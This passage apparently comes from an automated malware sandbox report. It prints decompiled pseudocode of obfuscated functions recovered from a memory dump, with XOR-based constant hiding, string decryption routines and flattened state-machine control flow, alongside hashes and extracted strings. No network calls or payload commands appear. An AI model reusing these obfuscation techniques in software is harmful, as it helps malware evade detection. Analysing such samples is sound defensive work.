				 *(_t108 + 0x20) =  *(_t108 + 0x20) ^ 0x00004b7b;
				_t93 =  *__ecx;
				_t96 =  &(_t95[1]);
				_t57 =  *_t95 ^ _t93;
				 *(_t108 + 0x28) = _t93;
				 *(_t108 + 0x2c) = _t57;
				_t32 = _t57 + 1; // 0xf93f
				_t100 =  !=  ? (_t32 & 0xfffffffc) + 4 : _t32;
				_t109 = _t108 + 4;
				_t74 = E00248736(_t100 + _t100);
				 *(_t109 + 0x20) = _t74;
				if(_t74 != 0) {
					_t94 = _t74;
					_t106 =  >  ? 0 :  &(_t96[_t100 >> 2]) - _t96 + 3 >> 2;
					if(_t106 != 0) {
						_t75 =  *(_t109 + 0x1c);
						do {
							_t84 =  *_t96;
							_t96 =  &(_t96[1]);
							_t85 = _t84 ^ _t75;
							 *_t94 = _t85 & 0x000000ff;
							_t94 = _t94 + 8;
							 *((short*)(_t94 - 6)) = _t85 >> 0x00000008 & 0x000000ff;
							_t86 = _t85 >> 0x10;
							_t107 = _t107 + 1;
							 *((short*)(_t94 - 4)) = _t86 & 0x000000ff;
							 *((short*)(_t94 - 2)) = _t86 >> 0x00000008 & 0x000000ff;
						} while (_t107 < _t106);
						_t74 =  *(_t109 + 0x18);
					}
					 *((short*)(_t74 +  *(_t109 + 0x20) * 2)) = 0;
				}
				return _t74;
			}

0x002588a4
0x002588a9
0x002588aa
0x002588af
0x002588b7
0x002588ba
0x002588be
0x002588c2
0x002588ca
0x002588d2
0x002588da
0x002588e8
0x002588ed
0x002588f1
0x002588f9
0x00258901
0x0025890f
0x00258912
0x00258916
0x0025891e
0x00258922
0x00258925
0x00258927
0x0025892b
0x0025892f
0x0025893f
0x0025894a
0x00258959
0x0025895b
0x00258963
0x0025896a
0x0025897b
0x00258980
0x00258982
0x00258986
0x00258986
0x00258988
0x0025898b
0x00258990
0x00258998
0x0025899e
0x002589a2
0x002589ab
0x002589ac
0x002589b3
0x002589b7
0x002589bb
0x002589bb
0x002589c5
0x002589c5
0x002589d2

Strings

{K, xrefs: 00258916
Q`, xrefs: 002588CA

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: Q`${K
API String ID: 0-3942002812
Opcode ID: 66a8dc07c374e087d51075cc4997c9489b13b1686e8462a41ad67111226f3164
Instruction ID: 7b12f00da6172b95a01154abd979792f69b0b255c1e76d17d8df0c2dc735bcf7
Opcode Fuzzy Hash: 66a8dc07c374e087d51075cc4997c9489b13b1686e8462a41ad67111226f3164
Instruction Fuzzy Hash: 2031CC72A187128FD314DF29C48446BF7E0FF88318F414B2DE889A7250DB74E90ACB86

Uniqueness

Uniqueness Score: -1.00%

Function 0025878F, Relevance: 2.6, Strings: 2, Instructions: 86
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E0025878F(void* __ecx, void* __edx, void* __eflags) {
				signed int* _t40;
				signed int _t42;
				unsigned int* _t55;
				signed int _t56;
				signed int _t58;
				signed int _t65;
				unsigned int _t66;
				unsigned int _t67;
				unsigned int* _t70;
				signed int* _t71;
				signed int* _t72;
				unsigned int _t74;
				void* _t80;
				void* _t82;
				void* _t84;
				void* _t85;

				_push( *((intOrPtr*)(_t84 + 0x18)));
				_push( *(_t84 + 0x24));
				_push(__ecx);
				_t40 = E0024602B( *((intOrPtr*)(_t84 + 0x18)));
				 *(_t84 + 0x34) = 0x2399;
				_t4 =  &(_t40[1]); // 0x4
				_t71 = _t4;
				 *(_t84 + 0x34) =  *(_t84 + 0x34) ^ 0xb4bbd3b6;
				 *(_t84 + 0x34) =  *(_t84 + 0x34) + 0xfffffbe3;
				 *(_t84 + 0x34) =  *(_t84 + 0x34) ^ 0xb4bbb717;
				 *(_t84 + 0x20) = 0xf668;
				 *(_t84 + 0x20) =  *(_t84 + 0x20) | 0x7255987b;
				 *(_t84 + 0x20) =  *(_t84 + 0x20) ^ 0x7255e635;
				 *(_t84 + 0x1c) = 0x6aea;
				 *(_t84 + 0x1c) =  *(_t84 + 0x1c) + 0xffff3e88;
				 *(_t84 + 0x1c) =  *(_t84 + 0x1c) ^ 0xffff96c8;
				_t58 =  *_t40;
				_t72 =  &(_t71[1]);
				_t42 =  *_t71 ^ _t58;
				 *(_t84 + 0x24) = _t58;
				 *(_t84 + 0x28) = _t42;
				_t23 = _t42 + 1; // 0x1
				_t74 =  !=  ? (_t23 & 0xfffffffc) + 4 : _t23;
				_t85 = _t84 + 8;
				_t55 = E00248736(_t74);
				 *(_t85 + 0x2c) = _t55;
				if(_t55 != 0) {
					_t82 = 0;
					_t70 = _t55;
					_t80 =  >  ? 0 :  &(_t72[_t74 >> 2]) - _t72 + 3 >> 2;
					if(_t80 != 0) {
						_t56 =  *(_t85 + 0x18);
						do {
							_t65 =  *_t72;
							_t72 =  &(_t72[1]);
							_t66 = _t65 ^ _t56;
							 *_t70 = _t66;
							_t70 =  &(_t70[1]);
							_t67 = _t66 >> 0x10;
							 *((char*)(_t70 - 3)) = _t66 >> 8;
							 *(_t70 - 2) = _t67;
							_t82 = _t82 + 1;
							 *((char*)(_t70 - 1)) = _t67 >> 8;
						} while (_t82 < _t80);
						_t55 =  *(_t85 + 0x28);
					}
					 *((char*)(_t55 +  *((intOrPtr*)(_t85 + 0x1c)))) = 0;
				}
				return _t55;
			}

0x00258799
0x0025879a
0x0025879f
0x002587a0
0x002587a5
0x002587ad
0x002587ad
0x002587b0
0x002587b8
0x002587c0
0x002587c8
0x002587d0
0x002587d8
0x002587e0
0x002587e8
0x002587f0
0x002587f8
0x002587fc
0x002587ff
0x00258801
0x00258805
0x00258809
0x00258819
0x00258824
0x00258832
0x00258834
0x0025883c
0x00258844
0x00258846
0x00258857
0x0025885c
0x0025885e
0x00258862
0x00258862
0x00258864
0x00258867
0x00258869
0x00258870
0x00258873
0x00258876
0x00258879
0x0025887f
0x00258880
0x00258883
0x00258887
0x00258887
0x00258890
0x00258890
0x0025889c

Strings

j, xrefs: 002587E0
5Ur, xrefs: 002587D8

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 5Ur$j
API String ID: 0-2435424154
Opcode ID: 3cdccfe5cfbb9caf67aa2b6a7def77af1c161ee780fa92b2d2a055404a860934
Instruction ID: eec462efa2cb403da049f5dd1ed0cf6e47776052ef4e385c1c4b5b1698939aa9
Opcode Fuzzy Hash: 3cdccfe5cfbb9caf67aa2b6a7def77af1c161ee780fa92b2d2a055404a860934
Instruction Fuzzy Hash: 3031AD72A093018FD314CF29C88545BFBE0EF98714F454B5DE989A7251C774E90ACB96

Uniqueness

Uniqueness Score: -1.00%

Function 00259586, Relevance: 2.6, Strings: 2, Instructions: 79
COMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E00259586(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				void* _t78;
				void* _t80;
				intOrPtr* _t81;
				intOrPtr _t95;

				_v40 = _v40 & 0x00000000;
				_v44 = 0x5b9444;
				_v12 = 0xdcba;
				_v12 = _v12 >> 4;
				_v12 = _v12 >> 4;
				_v12 = _v12 + 0x949;
				_v12 = _v12 ^ 0x00001af4;
				_v8 = 0x3cb;
				_v8 = _v8 + 0xffff192d;
				_v8 = _v8 + 0x1519;
				_v8 = _v8 ^ 0xffff4a83;
				_v20 = 0x60da;
				_v20 = _v20 >> 4;
				_t95 = _a4;
				_v20 = _v20 * 0x71;
				_v20 = _v20 ^ 0x0002f52e;
				_v24 = 0x45f5;
				_v24 = _v24 ^ 0x8ddfc3a3;
				_v24 = _v24 | 0x63507c9c;
				_v24 = _v24 ^ 0xefdfb5dc;
				_v32 = 0xfa49;
				_v32 = _v32 ^ 0xb8265659;
				_v32 = _v32 ^ 0xb826ab18;
				_v28 = 0xa34;
				_v28 = _v28 | 0x478cb459;
				_v28 = _v28 ^ 0x0d1ea304;
				_v28 = _v28 ^ 0x4a9200da;
				_v36 = 0x43f7;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 ^ 0x00001d3e;
				_v16 = 0x9c5f;
				_v16 = _v16 * 0x1d;
				_v16 = _v16 * 0x2e;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x65dacbc4;
				_t78 =  *((intOrPtr*)(_t95 + 4))( *((intOrPtr*)(_t95 + 0x28)), 1, 0);
				_t98 = _t78;
				if(_t78 != 0) {
					_push(0x25c860);
					_push(_v20);
					_t80 = E0025878F(_v12, _v8, _t98);
					_push(_v32);
					_t93 = _t80;
					_push(_v24);
					_t81 = E00256965(_t80,  *((intOrPtr*)(_t95 + 0x28)));
					if(_t81 != 0) {
						 *_t81();
					}
					E00252025(_v28, _t93, _v36, _v16);
				}
				return 0;
			}

0x0025958c
0x00259590
0x00259597
0x0025959e
0x002595a2
0x002595a6
0x002595ad
0x002595b4
0x002595bb
0x002595c2
0x002595cf
0x002595d6
0x002595dd
0x002595e6
0x002595ed
0x002595f0
0x002595f7
0x002595fe
0x00259605
0x0025960c
0x00259613
0x0025961a
0x00259621
0x00259628
0x0025962f
0x00259636
0x0025963d
0x00259644
0x0025964b
0x0025964f
0x00259656
0x00259661
0x00259668
0x0025966b
0x0025966f
0x00259679
0x0025967c
0x0025967e
0x00259681
0x00259686
0x0025968f
0x00259694
0x00259697
0x00259699
0x002596a1
0x002596ab
0x002596ad
0x002596ad
0x002596ba
0x002596c1
0x002596c8

Strings

I, xrefs: 002595A6
4, xrefs: 00259628

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 4$I
API String ID: 0-2585635819
Opcode ID: c0cc3ed7f4e6c0e6d786caaf46d58af62ad8a18f7d647b5fe573ce973da24075
Instruction ID: b620dbb8474b99da327574cdc5d89952c506f4395507aa2a9e1c18b4013ce116
Opcode Fuzzy Hash: c0cc3ed7f4e6c0e6d786caaf46d58af62ad8a18f7d647b5fe573ce973da24075
Instruction Fuzzy Hash: E7411371D0030AEBEF04DFA1C94A6EEBBB1FB44314F208159D811B6290D3B99B59CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00247998, Relevance: 2.6, Strings: 2, Instructions: 74
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E00247998(void* __ecx, void* __edx, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t74;
				intOrPtr _t83;
				signed int _t85;
				signed int _t86;
				signed int _t96;
				intOrPtr* _t97;

				_t97 = _a4;
				_push(_a12);
				_t96 = _a8;
				_push(_t96);
				_push(_t97);
				E0024602B(_t74);
				_v24 = 0x43bd;
				_v24 = _v24 >> 0xe;
				_v24 = _v24 ^ 0x00002257;
				_v20 = 0xfb35;
				_v20 = _v20 ^ 0x316dcd7c;
				_v20 = _v20 ^ 0x316d5b09;
				_v8 = 0x86ca;
				_t85 = 0x26;
				_v8 = _v8 / _t85;
				_v8 = _v8 + 0xffffb56c;
				_v8 = _v8 ^ 0xffffa5a2;
				_a4 = 0x6ea8;
				_a4 = _a4 | 0xeb58ef4a;
				_a4 = _a4 << 6;
				_t86 = 0x7d;
				_a4 = _a4 / _t86;
				_a4 = _a4 ^ 0x01b6ec6f;
				_v16 = 0xf7ce;
				_v16 = _v16 + 0xffffb713;
				_v16 = _v16 + 0xe2af;
				_v16 = _v16 ^ 0x0001a1e1;
				_v12 = 0x7f90;
				_v12 = _v12 >> 9;
				_v12 = _v12 ^ 0x9419cfce;
				_v12 = _v12 ^ 0x9419fbb9;
				_a8 = 0xab6f;
				_a8 = _a8 * 0x2a;
				_a8 = _a8 >> 0xf;
				_a8 = _a8 | 0x38dd753e;
				_a8 = _a8 ^ 0x38dd1846;
				E0025360F(_t96, _v24, _v20,  *((intOrPtr*)(_t97 + 4)), _v8);
				E00252674(_a4, _v16,  *((intOrPtr*)(_t97 + 4)),  *((intOrPtr*)(_t96 + 0x34)), _v12, _a8,  *_t97);
				_t83 =  *((intOrPtr*)(_t97 + 4));
				 *((intOrPtr*)(_t96 + 0x34)) =  *((intOrPtr*)(_t96 + 0x34)) + _t83;
				return _t83;
			}

0x0024799f
0x002479a3
0x002479a6
0x002479a9
0x002479aa
0x002479ad
0x002479b2
0x002479bb
0x002479bf
0x002479c6
0x002479cd
0x002479d4
0x002479db
0x002479e7
0x002479ec
0x002479f1
0x002479f8
0x002479ff
0x00247a06
0x00247a0d
0x00247a14
0x00247a19
0x00247a1c
0x00247a23
0x00247a2a
0x00247a31
0x00247a38
0x00247a3f
0x00247a46
0x00247a4a
0x00247a51
0x00247a58
0x00247a63
0x00247a66
0x00247a6a
0x00247a71
0x00247a84
0x00247a9d
0x00247aa2
0x00247aa8
0x00247ab0

Strings

JX, xrefs: 00247A06
[m1, xrefs: 002479D4

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: [m1$JX
API String ID: 0-848362422
Opcode ID: 753b8a0fce25be50dec76d604cb7334f1ed1f8c12209d0cf9d880ad97dc86ea5
Instruction ID: 8d051f0b849876c74c29fc0f07a456dcaa103f9c29986c82aa962bf72abb82eb
Opcode Fuzzy Hash: 753b8a0fce25be50dec76d604cb7334f1ed1f8c12209d0cf9d880ad97dc86ea5
Instruction Fuzzy Hash: C0310475900209FBCF58CFA5D94A89EBBB5FF44354F20C059E9196A260D3799B24DF80

Uniqueness

Uniqueness Score: -1.00%

Function 00249A37, Relevance: 1.6, Strings: 1, Instructions: 320
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00249A37(void* __ecx, signed int* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				char _v196;
				void* _t297;
				signed int _t335;
				signed int* _t340;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				char* _t354;
				void* _t380;
				void* _t381;
				void* _t382;
				void* _t383;
				void* _t386;

				_push(_a8);
				_t340 = __edx;
				_t380 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0024602B(_t297);
				_v24 = 0xc44;
				_t383 = _t382 + 0x10;
				_v24 = _v24 << 2;
				_v24 = _v24 << 5;
				_t381 = 0x108b8bb2;
				_v24 = _v24 >> 1;
				_v24 = _v24 ^ 0x0003068b;
				_v96 = 0x3b9e;
				_v96 = _v96 ^ 0x893884c8;
				_v96 = _v96 ^ 0x89388972;
				_v48 = 0x8b0e;
				_v48 = _v48 << 6;
				_v48 = _v48 + 0xffffd606;
				_t342 = 0x6d;
				_v48 = _v48 * 0x69;
				_v48 = _v48 ^ 0x0e30afa5;
				_v76 = 0xbb1c;
				_v76 = _v76 + 0xffff2a80;
				_v76 = _v76 | 0x384e25df;
				_v76 = _v76 ^ 0xffffbccb;
				_v68 = 0x817b;
				_v68 = _v68 + 0xb36b;
				_v68 = _v68 * 0x62;
				_v68 = _v68 ^ 0x00761722;
				_v112 = 0x78f7;
				_v112 = _v112 + 0xabd9;
				_v112 = _v112 ^ 0x00010bcc;
				_v64 = 0xef7a;
				_v64 = _v64 * 0x6b;
				_v64 = _v64 >> 6;
				_v64 = _v64 ^ 0x0001bb5c;
				_v104 = 0x32c;
				_v104 = _v104 << 5;
				_v104 = _v104 ^ 0x00002d3d;
				_v52 = 0x7426;
				_v52 = _v52 * 0x5d;
				_v52 = _v52 ^ 0xa80e6da6;
				_v52 = _v52 / _t342;
				_v52 = _v52 ^ 0x018aaa04;
				_v12 = 0xd0fb;
				_t343 = 0x6a;
				_v12 = _v12 / _t343;
				_v12 = _v12 + 0xffff7920;
				_v12 = _v12 + 0xffff83ce;
				_v12 = _v12 ^ 0xfffec2a6;
				_v108 = 0xe89;
				_v108 = _v108 + 0x85a8;
				_v108 = _v108 ^ 0x0000adac;
				_v92 = 0xd004;
				_v92 = _v92 + 0xffff90ab;
				_v92 = _v92 | 0x2bfbb4c5;
				_v92 = _v92 ^ 0x2bfba16d;
				_v8 = 0x51d1;
				_v8 = _v8 ^ 0x91ec542a;
				_v8 = _v8 | 0xbd5d6296;
				_v8 = _v8 + 0xe80e;
				_v8 = _v8 ^ 0xbdfe1041;
				_v40 = 0xc5fc;
				_v40 = _v40 | 0x331e7523;
				_v40 = _v40 + 0xc476;
				_v40 = _v40 | 0xe5b13554;
				_v40 = _v40 ^ 0xf7bfa45a;
				_v116 = 0x6d98;
				_v116 = _v116 >> 0xf;
				_v116 = _v116 ^ 0x000044aa;
				_v88 = 0x7357;
				_v88 = _v88 + 0x7cff;
				_t344 = 0x6e;
				_v88 = _v88 * 0x25;
				_v88 = _v88 ^ 0x0022e11b;
				_v56 = 0x39e0;
				_v56 = _v56 + 0xffffb0fb;
				_v56 = _v56 << 6;
				_v56 = _v56 ^ 0xfffab6b2;
				_v44 = 0x2257;
				_v44 = _v44 / _t344;
				_v44 = _v44 + 0x17fe;
				_v44 = _v44 + 0xffff4b8e;
				_v44 = _v44 ^ 0xffff3a3c;
				_v16 = 0xac11;
				_t345 = 0xd;
				_v16 = _v16 / _t345;
				_t346 = 0x22;
				_v16 = _v16 / _t346;
				_v16 = _v16 + 0xffff8051;
				_v16 = _v16 ^ 0xffffec84;
				_v32 = 0x207e;
				_v32 = _v32 + 0xffff85d9;
				_v32 = _v32 | 0x92dc0f10;
				_t347 = 0x3d;
				_v32 = _v32 * 0x4f;
				_v32 = _v32 ^ 0xffe76a4a;
				_v72 = 0xf5a4;
				_v72 = _v72 << 9;
				_v72 = _v72 + 0x6505;
				_v72 = _v72 ^ 0x01ebcff4;
				_v124 = 0xf81;
				_v124 = _v124 + 0x174a;
				_v124 = _v124 ^ 0x00005562;
				_v80 = 0xd566;
				_v80 = _v80 << 0xd;
				_v80 = _v80 << 0xa;
				_v80 = _v80 ^ 0xb30025af;
				_v20 = 0xd4e9;
				_v20 = _v20 ^ 0x0ea0d6e7;
				_v20 = _v20 / _t347;
				_v20 = _v20 | 0xf8279f10;
				_v20 = _v20 ^ 0xf83fc9b3;
				_v100 = 0xda9a;
				_v100 = _v100 * 3;
				_v100 = _v100 ^ 0x0002f5f9;
				_v36 = 0x78aa;
				_v36 = _v36 + 0x4117;
				_v36 = _v36 >> 0xa;
				_v36 = _v36 | 0x25804fa7;
				_v36 = _v36 ^ 0x25803510;
				_v28 = 0x20d5;
				_v28 = _v28 + 0xfab3;
				_v28 = _v28 | 0xa4f7c20c;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0x149e8671;
				_v60 = 0x9445;
				_v60 = _v60 | 0xc2ce9f5c;
				_v60 = _v60 ^ 0x46e2878d;
				_v60 = _v60 ^ 0x842c5375;
				_v120 = 0x3512;
				_v120 = _v120 << 9;
				_v120 = _v120 ^ 0x006a5627;
				_v84 = 0xeb51;
				_v84 = _v84 * 0x42;
				_v84 = _v84 >> 0xf;
				_v84 = _v84 ^ 0x000027de;
				goto L1;
				do {
					while(1) {
						L1:
						_t386 = _t381 - 0x1e9793a2;
						if(_t386 > 0) {
							break;
						}
						if(_t386 == 0) {
							E00247998(_v100, _v36, __eflags, _t380 + 0x20,  &_v196, _v28);
							_t383 = _t383 + 0xc;
							_t381 = 0x39ecd3df;
							continue;
						} else {
							if(_t381 == 0xaa31e0c) {
								E00247998(_v124, _v80, __eflags, _t380 + 0x18,  &_v196, _v20);
								_t383 = _t383 + 0xc;
								_t381 = 0x1e9793a2;
								continue;
							} else {
								if(_t381 == 0x108b8bb2) {
									 *_t340 =  *_t340 & 0x00000000;
									_t381 = 0x23e4e38d;
									_t340[1] = _t340[1] & 0x00000000;
									continue;
								} else {
									if(_t381 == 0x15969886) {
										_t354 =  &_v196;
										E0025360F(_t354, _v12, _v108,  *((intOrPtr*)(_t380 + 8)), _v92);
										_t383 = _t383 + 0xc;
										_t381 = 0x15fd630a;
										continue;
									} else {
										if(_t381 == 0x15fd630a) {
											_t354 =  &_v196;
											E0025360F(_t354, _v8, _v40,  *((intOrPtr*)(_t380 + 0xc)), _v116);
											_t383 = _t383 + 0xc;
											_t381 = 0x2ea6dd43;
											continue;
										} else {
											if(_t381 == 0x18d3ef4a) {
												_push(_t354);
												_t335 = E00248736(_t340[1]);
												 *_t340 = _t335;
												_t354 = _t354;
												__eflags = _t335;
												if(__eflags != 0) {
													_t381 = 0x22e1be53;
													continue;
												}
											} else {
												if(_t381 != 0x1a35bcc9) {
													goto L28;
												} else {
													_t354 =  &_v196;
													E0025360F(_t354, _v16, _v32,  *((intOrPtr*)(_t380 + 0x14)), _v72);
													_t383 = _t383 + 0xc;
													_t381 = 0xaa31e0c;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L23:
						__eflags =  *_t340;
						_t282 =  *_t340 != 0;
						__eflags = _t282;
						return 0 | _t282;
					}
					__eflags = _t381 - 0x22e1be53;
					if(_t381 == 0x22e1be53) {
						E002550F2( &_v196, _v76, _v68, _v112, _t340);
						_t383 = _t383 + 0xc;
						_t381 = 0x2d15c716;
						goto L28;
					} else {
						__eflags = _t381 - 0x23e4e38d;
						if(_t381 == 0x23e4e38d) {
							_t340[1] = E00257F1F(_t380);
							_t381 = 0x18d3ef4a;
							goto L1;
						} else {
							__eflags = _t381 - 0x2d15c716;
							if(__eflags == 0) {
								E00247998(_v64, _v104, __eflags, _t380,  &_v196, _v52);
								_t383 = _t383 + 0xc;
								_t381 = 0x15969886;
								goto L1;
							} else {
								__eflags = _t381 - 0x2ea6dd43;
								if(_t381 == 0x2ea6dd43) {
									E0025360F( &_v196, _v88, _v56,  *((intOrPtr*)(_t380 + 0x10)), _v44);
									_t383 = _t383 + 0xc;
									_t381 = 0x1a35bcc9;
									goto L1;
								} else {
									__eflags = _t381 - 0x39ecd3df;
									if(_t381 != 0x39ecd3df) {
										goto L28;
									} else {
										E0025360F( &_v196, _v60, _v120,  *((intOrPtr*)(_t380 + 0x28)), _v84);
									}
								}
							}
						}
					}
					goto L23;
					L28:
					__eflags = _t381 - 0x1d48367e;
				} while (__eflags != 0);
				goto L23;
			}

0x00249a43
0x00249a46
0x00249a48
0x00249a4a
0x00249a4d
0x00249a4e
0x00249a4f
0x00249a54
0x00249a5b
0x00249a5e
0x00249a64
0x00249a68
0x00249a6d
0x00249a70
0x00249a77
0x00249a7e
0x00249a85
0x00249a8c
0x00249a93
0x00249a97
0x00249aa4
0x00249aa7
0x00249aaa
0x00249ab1
0x00249ab8
0x00249abf
0x00249ac6
0x00249acd
0x00249ad4
0x00249adf
0x00249ae2
0x00249ae9
0x00249af0
0x00249af7
0x00249afe
0x00249b09
0x00249b0c
0x00249b10
0x00249b17
0x00249b1e
0x00249b22
0x00249b29
0x00249b34
0x00249b37
0x00249b45
0x00249b48
0x00249b4f
0x00249b59
0x00249b5c
0x00249b5f
0x00249b66
0x00249b6d
0x00249b74
0x00249b7b
0x00249b82
0x00249b89
0x00249b90
0x00249b97
0x00249b9e
0x00249ba5
0x00249bac
0x00249bb3
0x00249bba
0x00249bc1
0x00249bc8
0x00249bcf
0x00249bd6
0x00249bdf
0x00249be6
0x00249bed
0x00249bf4
0x00249bf8
0x00249bff
0x00249c06
0x00249c13
0x00249c16
0x00249c19
0x00249c20
0x00249c27
0x00249c2e
0x00249c32
0x00249c39
0x00249c47
0x00249c4a
0x00249c51
0x00249c58
0x00249c5f
0x00249c69
0x00249c6e
0x00249c76
0x00249c7b
0x00249c80
0x00249c87
0x00249c8e
0x00249c95
0x00249c9c
0x00249ca7
0x00249ca8
0x00249cab
0x00249cb2
0x00249cb9
0x00249cbd
0x00249cc4
0x00249ccb
0x00249cd2
0x00249cd9
0x00249ce0
0x00249ce7
0x00249ceb
0x00249cef
0x00249cf6
0x00249cfd
0x00249d09
0x00249d0c
0x00249d13
0x00249d1a
0x00249d25
0x00249d28
0x00249d2f
0x00249d36
0x00249d3d
0x00249d41
0x00249d48
0x00249d4f
0x00249d56
0x00249d5d
0x00249d64
0x00249d68
0x00249d6f
0x00249d76
0x00249d7d
0x00249d84
0x00249d8b
0x00249d92
0x00249d96
0x00249d9d
0x00249da8
0x00249dab
0x00249daf
0x00249daf
0x00249db6
0x00249db6
0x00249db6
0x00249db6
0x00249dbc
0x00000000
0x00000000
0x00249dc2
0x00249ee5
0x00249eea
0x00249eed
0x00000000
0x00249dc8
0x00249dce
0x00249ebf
0x00249ec4
0x00249ec7
0x00000000
0x00249dd4
0x00249dda
0x00249e9a
0x00249e9d
0x00249ea2
0x00000000
0x00249de0
0x00249de6
0x00249e79
0x00249e88
0x00249e8d
0x00249e90
0x00000000
0x00249dec
0x00249df2
0x00249e55
0x00249e64
0x00249e69
0x00249e6c
0x00000000
0x00249df4
0x00249dfa
0x00249e32
0x00249e37
0x00249e3c
0x00249e3f
0x00249e40
0x00249e42
0x00249e48
0x00000000
0x00249e48
0x00249dfc
0x00249e02
0x00000000
0x00249e08
0x00249e0b
0x00249e1a
0x00249e1f
0x00249e22
0x00000000
0x00249e22
0x00249e02
0x00249dfa
0x00249df2
0x00249de6
0x00249dda
0x00249dce
0x00249f45
0x00249f47
0x00249f4b
0x00249f4b
0x00249f52
0x00249f52
0x00249ef7
0x00249efd
0x00249fbe
0x00249fc3
0x00249fc6
0x00000000
0x00249f03
0x00249f03
0x00249f09
0x00249fa1
0x00249fa4
0x00000000
0x00249f0f
0x00249f0f
0x00249f15
0x00249f88
0x00249f8d
0x00249f90
0x00000000
0x00249f17
0x00249f17
0x00249f1d
0x00249f65
0x00249f6a
0x00249f6d
0x00000000
0x00249f1f
0x00249f1f
0x00249f25
0x00000000
0x00249f2b
0x00249f3d
0x00249f42
0x00249f25
0x00249f1d
0x00249f15
0x00249f09
0x00000000
0x00249fcb
0x00249fcb
0x00249fcb
0x00000000

Strings

'Vj, xrefs: 00249D96

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 'Vj
API String ID: 0-2210790371
Opcode ID: 752dd2814c582dd95a6ec796e85cdc249e3cc29c0e69a297da20739e8b56e3d6
Instruction ID: 7c38e004969933c3ba526e76d0bd22d597ed6c975e447848c572e6647a4ab8c7
Opcode Fuzzy Hash: 752dd2814c582dd95a6ec796e85cdc249e3cc29c0e69a297da20739e8b56e3d6
Instruction Fuzzy Hash: 3FF14272C1031ADBDF18DFE5C98A9DEBBB1FB00314F248159D416BA2A0D3B41A9ACF45

Uniqueness

Uniqueness Score: -1.00%

Function 00251BDF, Relevance: 1.5, Strings: 1, Instructions: 283
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00251BDF() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				unsigned int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				unsigned int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				char _v112;
				short _t303;
				void* _t311;
				void* _t314;
				void* _t315;
				intOrPtr _t347;
				void* _t348;
				short* _t349;
				void* _t350;
				short* _t351;
				short* _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				void* _t365;

				_t347 =  *0x25ca2c; // 0x6d8300
				_v48 = 0xd714;
				_t348 = _t347 + 0x230;
				_v48 = _v48 ^ 0xcd668ab2;
				_t315 = 0x3a31b660;
				_v48 = _v48 | 0x2f181106;
				_v48 = _v48 ^ 0xef7e1823;
				_v84 = 0x5d44;
				_t353 = 0x2d;
				_v84 = _v84 / _t353;
				_v84 = _v84 ^ 0x00001499;
				_v28 = 0xf70b;
				_t354 = 0xd;
				_v28 = _v28 / _t354;
				_v28 = _v28 | 0x6a0646bd;
				_v28 = _v28 >> 1;
				_v28 = _v28 ^ 0x35037bad;
